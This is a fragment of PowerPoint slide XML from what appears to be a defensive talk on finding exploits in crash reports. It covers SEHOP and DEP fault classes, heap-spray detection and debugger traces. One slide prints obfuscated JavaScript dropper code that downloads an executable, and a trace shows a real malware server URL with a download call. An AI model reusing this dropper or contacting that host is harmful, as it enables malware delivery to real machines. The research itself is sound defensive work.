              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="Picture 22" descr="Database blu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04" y="1800"/>
                <a:ext cx="218" cy="26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178448" y="4088011"/>
            <a:ext cx="914400" cy="685800"/>
            <a:chOff x="2170" y="3308"/>
            <a:chExt cx="1060" cy="674"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Picture 15" descr="Server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2599" y="3308"/>
              <a:ext cx="327" cy="482"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 16" descr="laptop notebook portable Computer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80" y="3556"/>
              <a:ext cx="450" cy="426"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 17" descr="PC with flat panel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70" y="3433"/>
              <a:ext cx="533" cy="534"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 14" descr="3-01545_attac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1848" y="4093926"/>
            <a:ext cx="488552" cy="4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868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crashes feed Telemetry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 58"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8686800" y="990600"/>
            <a:ext cx="1828800" cy="1371600"/>
            <a:chOff x="6781800" y="4648200"/>
            <a:chExt cx="1828800" cy="1371600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781800" y="4953000"/>
              <a:ext cx="18288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81800" y="4648200"/>
              <a:ext cx="1189941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600" dirty="0"/>
                <a:t>iexplore.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54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525000" y="1524000"/>
            <a:ext cx="363538" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55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906000" y="1371600"/>
            <a:ext cx="363538" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 28" descr="bull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906000" y="1752600"/>
            <a:ext cx="363538" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rectangle 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8991600" y="2362201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exploit code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hijacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Picture 5" descr="C:\Users\johnla\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TXAQIM4G\MPj03961210000[1]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763000" y="1371600"/>
            <a:ext cx="609600" cy="917986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Picture 2" descr="C:\Users\johnla\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OIODY68J\MCj02932160000[1].wm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15401" y="1371600"/>
            <a:ext cx="462111" cy="457200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</p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Bent Arrow 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6835170" y="3634770"/>
            <a:ext cx="807660" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="bent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Bent Arrow 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4838700" y="952500"/>
            <a:ext cx="2286000" cy="5257800"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 18478"/>
              <a:gd name="adj3" fmla="val 22878"/>
              <a:gd name="adj4" fmla="val 43750"/>
            </a:avLst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Internet cloud we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91320" y="3124201"/>
            <a:ext cx="1776480" cy="767915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic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848600" y="5288340"/>
            <a:ext cx="838200" cy="990600"/>
            <a:chOff x="4857" y="1445"/>
            <a:chExt cx="756" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="68" name="Picture 19" descr="Serve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7" y="1445"/>
              <a:ext cx="454" cy="670"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic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5079" y="1639"/>
              <a:ext cx="534" cy="670"/>
              <a:chOff x="4888" y="1437"/>
              <a:chExt cx="534" cy="670"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="70" name="Picture 21" descr="Serve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88" y="1437"/>
                <a:ext cx="454" cy="670"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="71" name="Picture 22" descr="Database blu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04" y="1800"/>
                <a:ext cx="218" cy="26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73" name="Rectangle 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458201" y="4983540"/>
            <a:ext cx="20619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Company.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Corporate Error Reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59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52800" y="4038600"/>
            <a:ext cx="1600200" cy="1076984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Picture 4" descr="MPj03999810000[1]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524000" y="1524000"/>
            <a:ext cx="1981200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Picture 5" descr="Funny Guy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362200"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Up Arrow 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="3200400"/>
            <a:ext cx="381000" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="up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>
            <a:off x="3581400" y="990600"/>
            <a:ext cx="2819400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73815"/>
              <a:gd name="adj2" fmla="val 105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Crash happens after exploit is “de-cloaked”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6629400" y="3276600"/>
            <a:ext cx="2819400" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -106248"/>
              <a:gd name="adj2" fmla="val 31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victim is in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Problem Class IDs,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Overwrite Protection Invoked:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STRING_DEREFERENCE_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEHOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_EXH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEP crash on a “NOP” instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOFTWARE_NX_FAULT_FILL_PATTERN_0c0c0c0c_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NXCODE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free Latte from SWI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SOFTWARE_NX_FAULT_FILL_PATTERN_ 0a0a0a0a_WITH_SCRIPT_CODE_NXCODE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Chain Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Figure 1 Exception Handlers in the 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6705600" cy="4212740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1143000"/>
            <a:ext cx="1447800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51304"/>
              <a:gd name="adj2" fmla="val 901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Terminates properly?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76600" y="2133600"/>
            <a:ext cx="1447800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56175"/>
              <a:gd name="adj2" fmla="val 822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Within stack bounds?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048000" y="2971800"/>
            <a:ext cx="1524000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 69111"/>
              <a:gd name="adj2" fmla="val -170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Points to loaded module?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763000" y="1219200"/>
            <a:ext cx="1524000" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -55626"/>
              <a:gd name="adj2" fmla="val 671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Heapspray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nopsled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Points to pop/pop/ret?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381336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Detecting HEAPSPRAY by measuring entropy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8B7CD-5157-4CDB-970E-E820B957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1" y="1890713"/>
            <a:ext cx="3886200" cy="38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400800" y="304800"/>
            <a:ext cx="396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0390650311.cab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>heapsprayed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/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905000"/>
            <a:ext cx="3953618" cy="394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05000" y="319088"/>
            <a:ext cx="396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0442659771.cab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(random normal crash)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15157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Sometimes they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ain't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> too smart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580ABD-C831-4192-B853-39E0C0125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787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81001"/>
            <a:ext cx="9144000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itchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> function QsAwr4IqF3SrnD(UsnmGC3) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> RTMD1Q =  "http://localhost/file.php";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> A6Yl7OdY = UsnmGC3.CreateObject("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Scr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ipt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ing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>."+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Fi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leSy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ste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mO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+"b"+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+"je"+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+"ct", "")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Kma3BVim8YN = DOqP4dJqWifhC(UsnmGC3, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Sh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+"el"+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l.A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ppl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i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+"ca"+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io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+"n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> gLX0dPRtqVV = DOqP4dJqWifhC(UsnmGC3, "A"+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+"DO"+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+"DB"+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+"."+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+"S"+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+"r"+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+"ea"+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+"m");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ht40kQmiMPwFvoe = null;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                        d1keFgx = A6Yl7OdY.BuildPath(A6Yl7OdY.GetSpecialFolder(2), "Vk85JvggiO"+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+".e"+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xe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                        gLX0dPRtqVV.Mode = 51*83-67-4163;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                        try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ht40kQmiMPwFvoe = DOqP4dJqWifhC(UsnmGC3, "Mi"+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+"c"+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ros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+"oft"+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+".X"+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+"ML"+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+"HT"+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+"P");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ht40kQmiMPwFvoe.open("GET", RTMD1Q, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                        } catch(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pimpey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)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try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ht40kQmiMPwFvoe = DOqP4dJqWifhC(UsnmGC3, "M"+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+"SX"+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+"ML2"+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+".XM"+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+"LH"+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+"TT"+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+"P");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ht40kQmiMPwFvoe.open("GET", RTMD1Q, false);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} catch(gzF0QXKPK3)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try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ht40kQmiMPwFvoe = DOqP4dJqWifhC(UsnmGC3, "MSX"+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+"ML"+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+"2.S"+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erv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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>erX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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+"MLH"+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+"TT"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JeNWbAzO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+"P");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ht40kQmiMPwFvoe.open("GET", RTMD1Q, false);;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} catch(tnDt9FAKRdbFzO)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try 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        ht40kQmiMPwFvoe=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();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        ht40kQmiMPwFvoe.open("GET", RTMD1Q, false);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} catch(SKBNfyo05PAFp){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        return 54-29-95*4+11+344;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        }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        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                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1" y="6488668"/>
            <a:ext cx="179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0468574568.cab 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2800" y="1"/>
            <a:ext cx="70134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Didn’t modify the POC to point to the malware server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Bent Arrow 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6477000" y="457200"/>
            <a:ext cx="685800" cy="304800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17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971801"/>
            <a:ext cx="7772400" cy="2797175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OOPS 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407528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17693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0:008&gt; k99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ChildEBP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RetAddr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047a0ffc 76db728b kernel32!TlsGetValue+0x2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047a100c 76db817b wininet!InternetGetThreadInfo+0x18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047a1bdc 776af8db wininet!InternetQueryOptionA+0x81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047a1c14 ...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047a26ac 77716524 urlmon!URLDownloadToFileW+0x51	</a:t>
            </a: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047a27e4 775117b7 urlmon!URLDownloadToFileA+0x109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047a733c: urlmon!_except_handler4+0 (77723fff)	  	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047a7418: user32!_except_handler4+0 (771480eb)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047a747c: user32!_except_handler4+0 (771480eb)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047a7be0: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047a83f4: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047a8c08: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047a941c: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047a9c30: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047aa444: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047aac58: ntdll!ExecuteHandler2+3a (77eeb6e5)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047ab46c: ntdll!ExecuteHandler2+3a (77eeb6e5)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0489e938: 0c0c0c0c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Invalid exception stack at 0c0c0c0c			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0489e740 90909090 QuickTimeStreaming+0x806b1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00000000 00000000 0x90909090</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610601" y="304800"/>
            <a:ext cx="174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0337664508.cab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7640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IUnknown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* caller = 0x00000000,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wchar_t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szURL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= 0x047a2764 "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http://81.29.241.20/spk2/file.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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wchar_t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szFileName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= 0x047a26e4 "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C:\Windows\system32\~.exe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",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                       unsigned long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dwReserved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= 0,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                      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</a:rPr>
              <a:t>IBindStatusCallback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</a:rPr>
              <a:t> * callback = 0x00000000)+0x51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1066800"/>
            <a:ext cx="26089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</a:rPr>
              <a:t>Download?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4514" y="3581401"/>
            <a:ext cx="32710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</a:rPr>
              <a:t>492 exception </a:t>
            </a:r>
          </a:p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</a:rPr>
              <a:t>frames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845314"/>
            <a:ext cx="28956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</a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Left Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="1295400"/>
            <a:ext cx="838200" cy="3810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6400800" y="3810000"/>
            <a:ext cx="838200" cy="3810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6400800" y="6096000"/>
            <a:ext cx="838200" cy="3810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0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2514601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0:008&gt; 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exr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-1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ExceptionAddress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77501392 (kernel32!TlsGetValue+0x00000002)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ExceptionCode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c0000005 (Access violation)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ExceptionFlags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00000000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NumberParameters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2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Parameter[0]: 00000001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Parameter[1]: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047a0ffc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Attempt to write to address 047a0ffc</a:t>
            </a:r>
          </a:p>
          <a:p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0:008&gt; !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teb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TEB at 7ef9a000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ExceptionList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       047a2c18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StackBase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:            048a0000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StackLimit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:           047a1000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838200"/>
            <a:ext cx="2667000" cy="6019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kernel32!TlsGetValue+0x2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wininet!InternetGetThreadInfo+0x18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wininet!InternetQueryOptionA+0x81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urlmon!URLDownloadToFileW+0x51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urlmon!URLDownloadToFileA+0x109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urlmon!_except_handler4+0 (77723fff)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user32!_except_handler4+0 (771480eb)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user32!_except_handler4+0 (771480eb)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ntdll!ExecuteHandler2+3a (77eeb6e5) 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0489e938: 0c0c0c0c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0489e740 90909090 QuickTimeStreaming+0x806b1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000 00000000 0x90909090</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="700" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin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392668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Call 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2000" y="762000"/>
            <a:ext cx="6019800" cy="707886"/>
            <a:chOff x="3048000" y="762000"/>
            <a:chExt cx="6019800" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3914979" y="762000"/>
              <a:ext cx="515282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Runs out of stack space</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Left Arrow 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3048000" y="990600"/>
              <a:ext cx="838200" cy="3810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" name="Explosion 1 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="609600"/>
            <a:ext cx="457200" cy="4572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1200" y="-609600"/>
            <a:ext cx="8229600" cy="1874838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
